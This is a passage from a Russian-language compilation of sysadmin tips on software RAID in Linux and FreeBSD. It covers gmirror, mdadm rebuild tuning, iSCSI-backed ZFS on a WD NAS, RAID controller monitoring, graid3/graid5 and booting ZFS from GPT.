round-robin swap /dev/ada0p2 # gmirror label -vb round-robin root /dev/ada0p3 # gmirror load Итого у нас получаютcя 3 зеркала. Сразу же добавляем к зеркалам по их второй половине: # gmirror insert boot /dev/ada1p1 # gmirror insert swap /dev/ada1p2 # gmirror insert root /dev/ada1p3 Начнется процедура зеркалирования, длительность которой зависит от объема данных и характеристик жестких дисков. Наблюдать за этим увлекательным процессом можно при помощи команды: # gmirror status А пока дожидаемся окончания этого процесса, чтобы зря не терять времени, можно не спеша сделать еще 2 полезные вещи. Первая, добавить модуль gmirror в загрузку ядра: # mount /dev/mirror/root /mnt # echo ‘geom_mirror_load="YES"’ > /mnt/boot/loader.conf И вторая, отредактировать fstab в соответствии с измененными под зеркала именами разделов: # cat /mnt/etc/fstab #Device Mountpoint FStype Options Dump Pass# /dev/mirror/swap none swap sw 0 0 /dev/mirror/root / ufs rw 1 1 На этом все. После окончания синхронизации зеркал, можно перезагрузиться и устроить системе тест, отключая то один диск, то другой. Только главное не увлечься и не забыть, что каждый раз, при возвращении диска в RAID, нужно обязательно дожидаться окончания процесса синхронизации, иначе вы потеряете данные.

Увеличение скорости перестроения программного RAID в Linux (доп. ссылка 1) [комментарии]

Перестроение большого программного RAID в Linux может занимать десятки часов. Скорость синхронизации mdraid зависит от proc-переменных /proc/sys/dev/raid/speed_limit_max и /proc/sys/dev/raid/speed_limit_min, задающих максимальную и минимальную пропускную способность синхронизации данных. По умолчанию значения этих переменных выставлены в 200000 и 1000 (Кб). Манипулируя данными параметрами можно существенно увеличить скорость перестроения RAID-массива. Подобрать оптимальные значения можно в зависимости от производительности текущей дисковой системы, чем выше скорость синхронизации, чем меньше ресурсов остается для обработки текущих дисковых операций. Установим минимальную скорость в 50 Мб/сек, а максимальную в 300 Мб/cек: echo 50000 > /proc/sys/dev/raid/speed_limit_min echo 300000 > /proc/sys/dev/raid/speed_limit_max Посмотреть текущую скорость ресинхронизации можно в выводе команды: cat /proc/mdstat В результате вышеуказанных манипуляций время перестроения RAID было уменьшено с 22 до 2 часов. Если для рабочего RAID включить режим сохранения битовых карт (write-intent bitmap), то можно дополнительно увеличить скорость ресинхронизация после развала RAID в результате краха системы или экстренного отключения питания. Обратной стороной данного режима является небольшое замедление операций записи данных в RAID: mdadm --grow --bitmap=internal /dev/md0 Отключить данный режим можно так: mdadm --grow --bitmap=none /dev/md0

Создание масштабируемого хранилища с использованием WD MyBook NAS + FreeBSD + ZFS Автор: Алексей Волков [комментарии]

Вместо предисловия. RAID-Z doesn't require any special hardware. It doesn't need NVRAM for correctness, and it doesn't need write buffering for good performance. With RAID-Z, ZFS makes good on the original RAID promise: it provides fast, reliable storage using cheap, commodity disks. Jeff Bonwick [0] Мое знакомство с FreeBSD состоялось достаточно давно, как только по ряду причин прошла "первая любовь" к свежему на тот момент QNX Momentics. Просто решил взять другую OS для других задач, без всяких аргументов. Но страсть к ZFS возникла практически мгновенно, как только прочитал первые материалы по ней в свете включения кода в HEAD ветку FreeBSD. C тех пор мы не разлучны, а с выходом релиза FreeBSD 8.0, эта привязанность может стать вечной :) К сожалению, уж очень часто так случается, что место на разделе заканчивается, и в случае небольших офисных серверов, это превращается в маленькую трагедию. Завершив переезд на раздел большего размера, остаешься с неприятной мыслью, что этот раз был не последним, а следующий будет сложнее и дороже во всех смыслах этого слова. Относительно недавно, в розничную продажу поступила линейка NAS устройств WD My Book. Я так же обратил на нее внимание, но в первую очередь потому, что в голове промелькнула мысль - "Вот оно недостающее звено для бюджетного решения проблемы серверного пространства", но на тот момент я еще не знал как именно это можно сделать. Общая концепция заключалась в том, чтобы использовать NAS не так как его позиционирует производитель, а в виде блочного устройства. Другими словами ни CIFS/SAMBA ни FTP не нужны, требуется получить блочное устройство в составе FreeBSD но физически расположенное на NAS. И тогда на сцену выйдет ZFS и возьмет его в свои крепкие руки. Вариант с созданием блочного устройства посредством mdconfig поверх подключенной через CIFS точки монтирования, меня категорически не устраивал. Моя цель где то рядом с ggate, AoE (ATA over Ethernet) или iSCSI. Упомянутый выше NAS, является достаточно открытым и работает на базе armv5tejl Linux 2.6.17.14. А значит к нему можно получить доступ по ssh и установить дополнительный софт. Процедурs настройки ssh и репозитария optware можно найти по ссылкам [1] и [2]. К великой радости optware имеет пакет для предоставления блочного устройства по протоколу AoE, но радость была не долгой, так как все попытки получить AoE на стороне FreeBSD, оказались не удачными. Существующий AoE порт CORAID [3] я так и не смог заставить работать во FreeBSD 8, а мои вопросы к автору порта по email пока остались без ответа. Возвращаться к ядрам 7.X или тем более 6.X не имело смысла, так как терялась ZFS. Вспомнил про гору и Мухамеда, и выяснил что FreeBSD прекрасно дружит с iSCSI и все необходимое уже присутствует в базовой системе. Остается как то организовать iSCSI target на стороне NAS. Перепробовав массу вариантов собрать из исходников iSCSI target ( [4] [5] [6]), я практически отчаялся, пока не вспомнил, что FreeBSD имеет простенький порт net/iscsi-target. На удивление все собралось из исходников с первой попытки и у меня на руках оказался готовый бинарник iscsi-target [8] для ARM LINUX который я положил на NAS в /opt/sbin. Дело техники. В качестве iSCSI носителя будем использовать целиком раздел, который ранее выделялся для CIFS (/dev/md4) для чего нужно в /etc/init.d/network_servers.sh отключить запуск samba.sh и закоментить в /etc/fstab #/dev/md4 /shares/internal ext3 defaults,noatime 0 2 Узнаем полный объем md4. [root@BACKUP]# fdisk -l /dev/md4 Disk /dev/md4: 1992.0 GB, 1992096874496 bytes 2 heads, 4 sectors/track, 486351776 cylinders Units = cylinders of 8 * 512 = 4096 bytes fdisk показал размер 1992096874496. Опытным путем выяснилось, что в конфигурации iscsi-targe нужно указать на 1 меньше. Подготовим конфигурацию для iSCSI /etc/iscsi/targets extent0 /dev/md4 0 1992096874495 target0 rw extent0 192.168.0.0/24 а так же скрипт автоматического запуска сервиса iSCSI /etc/init.d/iscsi.sh [9] и добавляем его запуск в список сервисов /etc/init.d/network_servers.sh. Перезагружаем NAS. Настройка iSCSI initiator На стороне сервера FreeBSD (где будем организовывать ZFS пул) настраиваем инициатор. Утилитой iscontrol выясняем какое имя у нашего target. server# iscontrol -d targetaddress=nas.ip-or-hostname TargetName=iqn.1994-04.org.netbsd.iscsi-target:target0 TargetAddress=192.168.0.1:3260,1 Так как в теории устройств NAS у нас должно быть много, их как то надо идентифицировать. Для целей идентификации MAC адрес подходит как нельзя кстати, тем более что он указан на корпусе NAS. Дополнительно можно намекнуть на объем устройство, и тогда получим идентификаторы вида 00:90:a9:0d:f3:72-2T 00:90:a9:3d:e3:7a-512G Cоздаем /etc/iscsi.conf # # Globals # port = 3260 # 00:90:a9:0d:f3:72-2T { # nickname targetaddress = nas.ip-or-hostname targetname = iqn.1994-04.org.netbsd.iscsi-target:target0 } Я не нашел штатных настроек FreeBSD для автозапуска инициатора, по этому добавил скрипт /usr/local/etc/rc.d/iscsiinitiator # PROVIDE: iscsiinitiator # REQUIRE: DAEMON # AFTER: NETWORK . /etc/rc.subr name="iscsiinitiator" rcvar=`set_rcvar` start_cmd=iscsi_start iscsi_start() { echo Start iSCSI initiator daemon -f iscontrol -c /etc/iscsi.conf -n 00:90:a9:0d:f3:72-2T } # read settings, set default values load_rc_config "$name" : ${iscsiinitiator="NO"} run_rc_command "$1" и соотвесвенно, требуется добавить в /etc/rc.conf строчку iscsiinitiator_enable="YES" Итак запускаем приемную часть iSCSI server# /usr/local/etc/rc.d/iscsiinitiator start Start iSCSI initiator В dmesg долны появится строки вида da0 at iscsi0 bus 0 target 0 lun 0 da0: <NetBSD NetBSD iSCSI 0> Fixed Direct Access SCSI-3 device Что означает что весь процесс пройден верно. Подготовка блочного устройства для включенияв общий пул Размечаем устройсво da0 средствами gpart server# gpart create -s gpt da0 server# gpart add -t freebsd-zfs -l 00:90:a9:0d:f3:72-2T da0 Проверяем что наше устройство корректно отобразилось в /dev/gpt server# ls /dev/gpt 00:90:a9:0d:f3:72-2T ... ... ... Создаем zfs пул server# zpool create -m /mnt/big-storage storage0 /dev/gpt/00:90:a9:0d:f3:72-2T И вот, наш пул готов! server# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT storage0 1,80T 72K 1,80T 0% ONLINE - Заключение Мои поверхностные тесты показали скорость работы данного пула, близкие к максимальным возможностям самой среды FastEthernet. Т.е. 5-6Mbyte/sec, что в моих обстоятельствах является более чем достаточном. Дополнительно стоит отметить, что с увеличением количества устройств в пуле, скорость так же будет расти (если конечно серверный порт и коммутатор гигабитные). P.S. Данный пример, своей целью имеет демострацию именно последовательности действий, а не рекомендуемый вариант использования. В реальных условиях нужно создавать пул из нескольких NAS устройств и объединять их в единый RAID-Z с одиночной или двойной точкой отказа. Но в любом случае последующая ситуация с отказом NAS устройства, или увеличением общего объема, будет заключаться в подготовке NAS для работы по iSCSI и добавлением его в ZFS пул, что представляется достаточно тривиальным и не зависящим от общего объема пула. Не маловажным остается тот факт, что все работы проводятся без остановки сервисов или тем белее перезагрузок. Дополнительное пространство просто появляется и начинает работать на Вас! [0] http://blogs.sun.com/bonwick/entry/raid_z [1] http://mybookworld.wikidot.com/ssh-enable [2] http://mybookworld.wikidot.com/optware [3] http://support.coraid.com/support/freebsd/ [4] http://www.open-iscsi.org/ [5] http://linux-iscsi.sourceforge.net/ [6] http://iscsitarget.sourceforge.net/ [7] http://www.freshports.org/net/iscsi-target/ [8] http://softlynx.ru/pub/WD-MyBook-NAS/iscsi-target [9] http://softlynx.ru/pub/WD-MyBook-NAS/iscsi.sh

Переход на RAID-1 в Linux (доп. ссылка 1) Автор: Иванов Аркадий [комментарии]

Сохранность данных на диске можно обеспечить вторым диском, который работает как зеркало для первого. Этот режим называется RAID первого уровня (Redundant Array of Inexpensive Disks - избыточный массив недорогих дисков). По другому - RAID-1. Рассмотрим случай, когда есть диск с установленной системой Linux и необходимо подключить второй диск и перевести эту пару в работу в режиме зеркала. Эта новая система должна выполнять следующие функции: * Писать данные одновременно на оба диска * При отказе одного диска грузиться как ни в чём ни бывало со второго. В Linux для этого есть драйвер MD, его поддержка загрузчиками LILO и GRUB и программа mdadm, с помощью которой мы управляемся с RAID-ами. Итак, дан компьютер с установленной на раздел /dev/sda2 работающей системой Linux. Раздел /dev/sda1 - это swap. Также у нас в наличии подключенный второй диск /dev/sdb с такой же геометрией. Он пока пуст. Замечу, что развлекался я в Alt Linux Server 4.0. Шаги по созданию raid-1: Убеждаемся, что ядро поддерживает raid1. Этот модуль может быть статическим в ядре или в виде подгружаемого модуля. Если это не так, вытаскивайте ядро с kernel.org, конфигурите его, собирайте его, устанавливайте и перезапускайтесь с него. Загружаем модуль, если они не статический: modprobe raid1 Устанавливаем пакет MDADM. Запускаем fdisk и делаем тип раздела /dev/sda2 как "Linux raid autodetect" Перезагружаемся. Делаем копию таблицы разделов первого диска на второй: sfdisk -d /dev/sda | sfdisk /dev/sdb Создаём raid-1 массив только из одного раздела /dev/sdb2, поскольку /dev/sda2 сейчас пока занят - с него мы загрузились. mdadm --create /dev/md0 --level=1 --raid-disk=2 missing /dev/sdb2 Параметр "missing" указывает программе, что у нас пока неполноценный массив и одного диска пока не хватает. Примечание: состояние raid-массивов можно всегда посмотреть в /proc/mdstat. Теперь создаём конфиг для mdadm. Файл называется /etc/mdadm.conf. Можно сделать это вручную: MAILADDR 77777XX777@sms.primtel.ru PROGRAM /sbin/mdadm-syslog-events DEVICE partitions ARRAY /dev/md0 level=raid1 num-devices=2 devices=/dev/sdb2,/dev/sda2 auto=md В этом файле указали адрес, куда слать сообщения о событиях в RAID и главное - из чего состоит наш RAID. Примечание: Запись об устройствах в этом файле можно сделать автоматически: mdadm --examine --scan >>/etc/mdadm.conf Делаем файловую систему на /dev/md0 (мы уже имеем raid-1 !): mkfs -t ext3 /dev/md0 Монтируем свежесозданный раздел: mkdir /mnt/md0 mount /dev/md0 /mnt/md0 Копируем систему с sda (предварительно стоит остановить все базы данных и прочие полезные программы): cp -dpRx / /mnt/md0 Обязательно следует скопировать ручками или создать inode для /dev/null и /dev/console в копии системы. В версиях ядер с udev без этого не обойтись. Грузимся с Live DVD с Linux-ом в режиме восстановления системы (у меня DVD Alt Linux это умеет). mkdir /mnt/1 mount /dev/md0 /mnt/1 mount /dev /mnt/1/dev -o bind mount /proc /mnt/1/proc -o bind mount /sys /mnt/1/sys -o bind chroot /mnt/1 Если вы всё сделали правильно, значит вы работает уже на своей системе на диске RAID-массива. Добавляем в RAID-1 первый диск: mdadm -a /dev/md0 /dev/sda2 Это длительная процедура. В этот момент началась синхронизация дисков. Её прерывать не следует. Просмотреть, что происходит можно так: watch -n 5 cat /proc/mdstat Раз в 5 секунд будет выводиться инфо о состоянии нашего RAID-а. После синхронизации, если вы добавляли автоматические записи в /etc/mdadm.conf, их стоит стереть и снова: mdadm --examine --scan >>/etc/mdadm.conf Если вы делали это вручную, то ничего делать не надо, поскольку у вас там нормальная запись об устройствах, а не их UUID-ы. Генерим новый RAM-диск: cd /boot rm initrd-2.6.28.img mkinitrd initrd-2.6.28.img 2.6.28 Надеюсь, ваше ядро поддерживает модуль raid1. Если это не так, то ничего не получится. (См. самый первый пункт). Обратите внимание, чтобы устройства жёстких дисков в Live CD были такими же, что и в вашей системе. Т.е. если в вашей системе это sda, то и при загрузке с LiveCD они должны быть sda, а не hda. Иначе в initrd могут не попасть нужные модули. Если это не так, выберите другой LiveCD или ручками в командной строке добавляйте в initrd не знаю уж какие модули. Правим /etc/lilo.conf, отмечу важные строки и конфиг для моего ядра: default="2628" boot="/dev/md0" raid-extra-boot=mbr-only disk=/dev/sda bios=0x80 disk=/dev/sdb bios=0x81 image="/boot/vmlinuz-2.6.28" label="2628" initrd="/boot/initrd-2.6.28.img" root="/dev/md0" read-only Затем выполняем "lilo". Предупреждение о том, что загрузочная запись будет в том числе и не на первом диске можно проигнорировать. Правим /etc/fstab. Вместо корня на /dev/sda2 указываем /dev/md0: /dev/md0 / ext3 defaults 1 1 Перезагружаемся и работаем с RAID-1. ПРИМЕЧАНИЕ: Если у вас GRUB, то: В /boot/grub/grub.conf должно быть: timeout 10 # Грузимся по умолчанию с sda, если не доступен, грузимся с sdb default 0 fallback 1 # Загрузка с первого диска title 2628 (hd0,0) kernel (hd0,0)/vmlinuz-2.6.28 root=/dev/md0 # Загрузка со второго диска, если с первого не получилось title 2628 (hd1,0) kernel (hd1,0)/vmlinuz-2.6.28 root=/dev/md0 Запускаем grub и делаем загрузочные записи на первом и втором диске # grub grub> root (hd0,0) grub> setup (hd0) grub> root (hd1,0) grub> setup (hd1) grub> quit ДОПОЛНЕНИЕ: Если у вас нет спасательного DVD или Live-DVD или ещё какие проблемы (у меня случилось так, что спасательный режим DVD с Alt Linux 5.0 ни в какую не определял устройство DVD, а Live DVD не хотел иметь ничего общего с /dev/md0), то: после копирования системы с /dev/sda2 на /dev/md0 можно сделать так: 1. Сделать новую initrd для /dev/sda и скопировать на /dev/md0: cd /boot mkinitrd initrd-2.6.28.img 2.6.28 cp initrd-2.6.28.img /mnt/md0/boot 2. Смонтировать /dev, /proc, /sys в /mnt/md0 (См. выше) 3. Поменять корень системы: chroot /mnt/md0 4. В lilo.conf указать загрузку не с /dev/md0, а /dev/sda: boot="/dev/sda" 5. В lilo.conf не вставлять строку: raid-extra-boot=mbr-only 6. Перезагрузиться. Система загрузится с /dev/md0. 7. Сделать и дождаться результата: mdadm -a /dev/md0 /dev/sda2 8. Исправить lilo.conf для полноценного RAID: boot="/dev/md0" raid-extra-boot=mbr-only 9. lilo и потом перезагрузка.

Неинтерактивная установка RedHat систем на mdraid: решение проблемы с GRUB (доп. ссылка 1) Автор: sHaggY_caT [комментарии]

Неинтерактивная установка RedHat систем на mdraid: решение проблемы с GRUB. Конструкция вида bootloader --location=mbr --driveorder=md0 в Anaconda кикстарте не решает проблему: grub все равно поставится на первый(в нумерации BIOS) диск. То есть загрузчик попадет и на второй, а вот stage2, уже нет. При вылете диска первого диска, с данными не произойдет ничего плохого, но система загрузиться не может, а возня в "боевых" условиях с live-cd, особенно через VirtualMedia может быть чревата большими-большими проблемами. Добавлю, что с Lilo такой проблемы нет, но Lilo уже прошлый век. Собственно, решением проблемы является режим grub-batch (командный режим работы grub). В секцию кикстарта %post можно положить вот такой код: #re-Install grub in mdraid grub --batch <<EOF device (hd0) /dev/sda device (hd1) /dev/sdb root (hd0,0) setup (hd0) root (hd1,0) setup (hd1) quit EOF Для установки grub на два диска. В centos wiki такой статьи (именно для неинтерактивной установки) нет, как и нет в RedHat документации. Пожалуйста, после замены вылетевшего диска, не забудьте прописать grub на новом диске вручную! По ссылке находится инструкция в wiki CentOS для решения данной проблемы при интерактивной инсталляции: http://wiki.centos.org/HowTos/SoftwareRAIDonCentOS5

Горячая замена диска в RAID gmirror Автор: Андрей Савченко [комментарии]

Цель: Необходимо создать RAID - массив с возможностью горячей замены. После длительных и неудачных игр с попыткой создать массив RAID10 или RAID1 через ICH7R, было принято решение попробовать программный RAID1. Попытка оказалась удачной. Но пришлось наступить на несколько граблей. Что бы облегчить этот путь другим, знакомлю сообщество с проверенным решением. Сразу хочу сказать, что статья поставляется как есть. Все что вы делаете, вы делаете на свой страх и риск. Я бы не рекомендовал все проверять на боевом сервере. Мои эксперименты проводились на: FreeBSD 7.2-RELEASE #0:GENERIC i386 Чипсет ICH7R Диски WDC WD5001AALS Требования: BIOS 1. SATA controller mode: Enhanced 2. SATA AHCI: Enabled или что то подобное В противном случае подключенный диск не инициализируется системой, во всяком случае, у меня не получилось. Подозреваю, что диск не инициализируется на уровне BIOS. Возможно, это частный случай. При использовании режима AHCI, диск инициализируется автоматом. Нет необходимости делать rescan или reinit и тому подобное. В моем случае все это не помогло, пока не выставил режим AHCI. Находим и отключаем убитый диск: Нам в помощь atacontrol list atacontrol cap device gmirror info gmirror status Внимание номера каналов и разъемов SATA никак не совпадают, в том числе их порядок. Например: # gmirror status Name Status Components mirror/gm0 COMPLETE ad4 ad8 mirror/gm1 DEGRADED ad6 Видно что массив gm0 находится в нормальном состоянии (COMPLETE), а массив gm1 находятся в аварийном режиме (DEGRADED). Так же видно в RAID gm1 один диск отсутствует!!! Его нужно найти и заменить. Предположим наихудший вариант - диск умер, и выяснить его серийный номер не представляется возможным. Тогда нужно действовать методом исключения. Выполняем команду "atacontrol cap device" для каждого видимого диска. Все диски можно увидеть с помощью "atacontrol list". # atacontrol list ATA channel 0: Master: no device present Slave: acd0 <LG CD-ROM CRD-8522B/2.01> ATA/ATAPI revision 0 ATA channel 1: Master: no device present Slave: no device present ATA channel 2: Master: ad4 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 3: Master: ad6 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 4: Master: ad8 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 5: Master: no device present Slave: no device present В нашем случае для ad4, ad8, ad6. # atacontrol cap ad8 В выводе этой команды мы увидим строку типа serial number WD-WCASY6287255 Таким образом мы получили номера всех работающих дисков. Дело за малым, найти их физически. Если диски не были помечены при установке, то тут проблема. Серийный номер диска указан на этикетке, иногда последние цифры номера указаны в торце, но в дальнем. Если винты установлены плотно, тогда лучше выключить машину и переписать номера винтов и пометить их удобным для вас способом. Достаточно легко можно посмотреть номера, если диски расположены перпендикулярно корпусу. Как вывод, нужно метить винчестеры в момент установки и брать соответствующий корпус для удобной замены. Путем исключения находим неработающий диск. Отключаем его следующим образом. 1. Отключаем DATA кабель. 2. Отключаем кабель питания. Ставим новый диск и подключаем его 1. Подключаем кабель питания. 2. Подключаем DATA кабель. "atacontrol list" должен показать новое устройство ad#. Например: ad10 # atacontrol list ATA channel 0: Master: no device present Slave: acd0 <LG CD-ROM CRD-8522B/2.01> ATA/ATAPI revision 0 ATA channel 1: Master: no device present Slave: no device present ATA channel 2: Master: ad4 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 3: Master: ad6 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 4: Master: ad8 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present ATA channel 5: Master: ad10 <WDC WD5001AALS-00L3B2/01.03B01> SATA revision 2.x Slave: no device present Добавляем новый диск в RAID-масив. Во первых нужно заставить RAID "забыть" об отключенном диске # gmirror forget gm1 Теперь команда "gmirror status gm1" покажет нам что RAID gm1 в полном порядке, правда состоит из одного диска. # gmirror status gm1 Name Status Components mirror/gm1 COMPLETE ad6 Можно приступить к добавлению нового подключенного винчестера. # gmirror insert gm1 /dev/ad10 Эта команда автоматически начинает перестроение массива. Теперь gmirror status покажет примерно такое: # gmirror status gm1 Name Status Components mirror/gm1 DEGRADED ad6 ad10 (1%) Наберитесь терпения эта процедура займет некоторое время. Для дисков 500G около двух часов. Естественно в это время все службы продолжают работать. По окончании процесса синхронизации порлучим: # gmirror status gm1 Name Status Components mirror/gm1 COMPLETE ad6 ad10 Если интересно то с помощью команд gstat или systat -io можно посмотреть активность процесса синхронизации.

Определение во FreeBSD состояния RAID-массива на базе SAS контроллера LSI (доп. ссылка 1) Автор: Панфилов Алексей [комментарии]

Имеем сервер c RAID-контроллерами LSI SAS 1064E (SAS 3000 series) и RAID-1, который FreeBSD видит как устройство da0. После физического удаления и последующего возвращения на место одного из дисков в syslog отображается соответствующее уведомление: Oct 21 22:16:28 bill kernel: mpt0:vol0(mpt0:0:0): RAID-1 - Degraded Oct 21 22:16:28 bill kernel: mpt0:vol0(mpt0:0:0): Status ( Enabled Re-Syncing ) Для просмотра типа RAID можно использовать "camcontrol periphlist da0", но при этом данные о текущем состоянии RAID не отображаются. Нашлось два решения: 1. Анализировать состояние переменной sysctl dev.mpt.0.nonoptimal_volumes если значение не равно нулю, то есть проблемы с состоянием RAID. 2. Собрать из исходных текстов mptutil (в портах его нет). Пробуем получить состояние массива: mptutil show volumes mpt0 Volumes: Id Size Level Stripe State Write-Cache Name da0 ( 136G) RAID-1 OPTIMAL Disabled

Мониторинг состояния контроллера Adaptec (доп. ссылка 1) Автор: ExpE [комментарии]

При хранении информации на RAID массиве создается иллюзия, что данные надежно защищены от потери в случае выхода из строя одного из носителей. Но пока не проводится регулярный мониторинг состояния логического раздела, можно просто своевременно не узнать об изменении состояния логического тома. Ниже будет описан мониторинг состояния контроллера Adaptec. Для мониторинга контроллеров Adaptec можно использовать утилиту arcconf, входящую в состав Storage Manager'a. Загрузить его можно по ссылке http://www.adaptec.com/en-US/downloads/ После установки, в случае Linux, rpm пакета появится директория /usr/StorMan/. Команда для получения полной информации о контроллере: # /usr/StorMan/arcconf getconfig 1 если появится ошибка вида /usr/StorMan/arcconf: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory нужно выполнить команду # export LD_PRELOAD="/usr/StorMan/libstdc++.so.5" Самой важной информацией является информация о состоянии логических дисков # /usr/StorMan/arcconf getconfig 1 ld Результат выполнения команды: Controllers found: 1 Logical device information Logical device number 0 Logical device name : tst RAID level : 5 Status of logical device : Optimal Size : 14300150 MB ... Ключевой информацией является строка Status of logical device : Optimal Команда для получения информации о состоянии физических дисков # /usr/StorMan/arcconf getconfig 1 ld Дополнительную информацию о состоянии контроллера можно получить в лог файлах # cat /usr/StorMan/RaidEvtA.log Ниже я приведу скрипт, который проверяет состояние логического диска и, если он не в состоянии Optimal, отправляет e-mail /usr/scripts/checkraid.pl #!/usr/bin/perl use Net::SMTP; $opt=`/usr/StorMan/arcconf getconfig 1 ld | grep "Status of logical device" | grep "Optimal" -c`; open (FH, ">> /var/log/raidcheck.log"); if ($opt==0) { print (FH scalar(localtime)); print (FH " Problem with RAID!\n"); $date=`exec /bin/date '+%F %T'`; chomp($date); $smtp = Net::SMTP->new('mail.server-name.ru'); $smtp->mail(' expe@server-name.ru '); $smtp->to('expe\@server-name.ru'); $smtp->data(); $smtp->datasend("To:expe\@server-name.ru \n"); $smtp->datasend("Subject: raid problem"); $smtp->datasend("\n"); $smtp->datasend("\n"); $smtp->datasend("[$date]Problem with raid on tst!"); $smtp->datasend("\n"); $smtp->dataend(); $smtp->quit; print "Problem with raid!\n"; } else { print (FH scalar(localtime)); print (FH " Status of raid is optimal\n"); print "Status of raid is optimal!\n"; }; close(FH);

Настройка RAID3 и RAID5 во FreeBSD [комментарии]

В отличии от RAID5 в RAID3 для хранения контрольных сумм выделяется отдельный диск, при этом данные распределяются по дискам не на уровне блоков, а на уровне байтов (каждый запрос приводит к обращению ко всем дискам). RAID3 оптимален при работе с данными большого объема и преобладании линейных запросов. При работе с большим числом мелких файлов, производительность падает. Имеем: 5 500GB SATA дисков /dev/ad1 ... /dev/ad5, 1 для контрольных сумм и 4 для хранения данных. В итоге получим массив размером 2 Тб. Загружаем модуль ядра с реализацией geom класса graid3: graid3 load Создаем массив (вместо rd3 можно указать любое желаемое имя): graid3 label -r rd3 ad1 ad2 ad3 ad4 ad5 Опция "-r" включает задействование для операций чтения диска с контрольными суммами, подобное позволяет значительно увеличить скорость параллельного случайного доступа к файлам, но уменьшает производительность последовательного чтения. Проверяем статус: graid3 status Name Status Components raid3/rd3 COMPLETE ad1 ad2 ad3 ad4 ad5 Смотрим список дисков: graid3 list Форматируем (-U - включение Soft Updates): newfs -U /dev/raid3/rd3 Монтируем: mkdir /bigstore mount /dev/raid3/rd3 /bigstore Автоматизируем подключение при загрузке, в /boot/loader.conf добавляем geom_raid3_load="YES" В /etc/fstab прописываем монтирование раздела: /dev/raid3/rd3 /bigstore ufs rw,noatime 1 1 В случае повреждения диска, достаточно его заменить без выполнения каких-либо команд - подключение нового диска и перестроение массива будут выполнены автоматически, мета данные о структуре массива сохраняются на каждом диске.\ Для настройки RAID5 необходимо использовать одну из неофициальный реализаций GEOM классов: http://wgboome.homepage.t-online.de/geom_raid5-eff.tbz http://wgboome.homepage.t-online.de/geom_raid5-pp.tbz Устанавливается, примерно так: cd /usr/src fetch http://wgboome.homepage.t-online.de/geom_raid5-eff.tbz tar xvfz geom_raid5-eff.tbz cd /usr/src/sys/modules/geom/geom_raid5 && make clean depend all install mkdir -p /usr/include/geom/raid5 cp -p /usr/src/sys/geom/raid5/g_raid5.h /usr/include/geom/raid5/g_raid5.h cd /usr/src/sbin/geom/class/raid5 && make depend && make && make install или загрузить и выполнить готовый установочный скрипт http://www.fluffles.net/files/installgraid5 С точки зрения настройки graid5, работает аналогично graid3, например, создание массива: graid5 label rd5 ad1 ad2 ad3 Для расширения размера массива через добавление нового диска можно использовать скрипт http://www.fluffles.net/files/graid5-expand : ./graid5-expand rd5 ad4 growfs /dev/raid5/rd52 fsck -t ufs /dev/raid5/rd52 далее работаем уже с /dev/raid5/rd52 (имя нового раздела будет выведено во время запуска скрипта). Прогресс развития graid5 можно наблюдать в форуме http://www.fluffles.net/forum/storage Оценку производительности и советы по тюнингу можно найти на страницах: http://blog.lexa.ru/2008/12/07/uprazhnenija_s_brevnom_freebsd_raid5_performance.html http://blog.lexa.ru/2008/12/09/uprazhnenija_s_brevnom___2_graid5_gjournal.html

Настройка загрузки ZFS с GPT-раздела во FreeBSD и создание зеркала (доп. ссылка 1) Автор: unknown [комментарии]

Во FreeBSD 8-CURRENT недавно появилась поддержка загрузки ядра с ZFS, а сама файловая система была обновлена до версии 13. Процесс развертывания ZFS с возможностью загрузки с нее очень простой: 1. Собираете world с LOADER_ZFS_SUPPORT и kernel с поддержкой gpart(8): # добавляем в make.conf(5) опцию поддержки ZFS для loader(8) echo LOADER_ZFS_SUPPORT=yes >>/etc/make.conf # собираем world... нет, только loader(8) и загрузочный код cd /usr/src/sys/boot make cleandir; make cleandir make obj depend all install # добавляем поддержку таблиц разделов для gpart(8) cat MYKERNEL include GENERIC nooption GEOM_BSD nooption GEOM_MBR options GEOM_PART_BSD options GEOM_PART_MBR options GEOM_PART_GPT # собираем kernel make kernel KERNCONF=MYKERNEL -C/usr/src 2. Размечаете первый диск командой gpart(8) на несколько разделов, из которых обязательны только freebsd-boot и freebsd-zfs: # создаем таблицу разделов типа GPT на диске ad0 gpart create -s GPT ad0 # добавляем загрузочный код, позволяющий загружаться с GPT разделов gpart bootcode -b /boot/pmbr ad0 # создаем раздел для кода загрузки loader(8)'а с раздела GPT gpart add -b 34 -s 256 -t freebsd-boot ad0 # записываем загрузочный код на него gpart bootcode -p /boot/gptzfsboot -i 1 ad0 # создаем swap раздел для возможности использовать его # в качестве dumpdev, т.к. делать kernel dump'ы на zvol'ах # невозможно gpart add -b 290 -s 2097152 -t freebsd-swap ad0 # создаем основной раздел для ZFS gpart add -b 2097442 -s 232344173 -t freebsd-zfs ad0 # смотрим на результат gpart show => 34 234441581 ad0 GPT (112G) 34 256 1 freebsd-boot (128K) 290 2097152 2 freebsd-swap (1.0G) 2097442 232344173 3 freebsd-zfs (111G) 3. Создаете pool для ZFS на первом разделе и загружаетесь с него: # создаем pool с именем `h', выключенном поддержкой # времени последнего доступа и включенным сжатием данных zpool create -O atime=off -O compression=on h ad0p3 # создаем необходимые dataset'ы zfs create -p -o setuid=off -o utf8only=on h/usr/home zfs create -o sharenfs='-alldirs -webnfs' h/usr/ports zfs create -o atime=on h/var zfs create -o readonly=on h/var/empty # населяем pool[1] rsync -aHS --del --fileflags --filter 'merge migrate.rsync' / /h/ # перезагружаемся shutdown -r now # загружаемся *не* с ZFS в single-user режим (loader prompt) boot -s # меняем точку монтирования pool'а на корень /etc/rc.d/hostid restart /sbin/zfs set mountpoint=/ h # перезагружаемся /sbin/reboot # загружаемся с ZFS (loader prompt) load zfs set vfs.root.mountfrom=zfs:h boot # добавляем в loader.conf(5) поддержку zfs и точку # монтирования / (корня) echo zfs_load=YES >>/boot/loader.conf echo vfs.root.mountfrom=\"zfs:h\" >>/boot/loader.conf 4. Повторяете шаг 1 для второго диска и 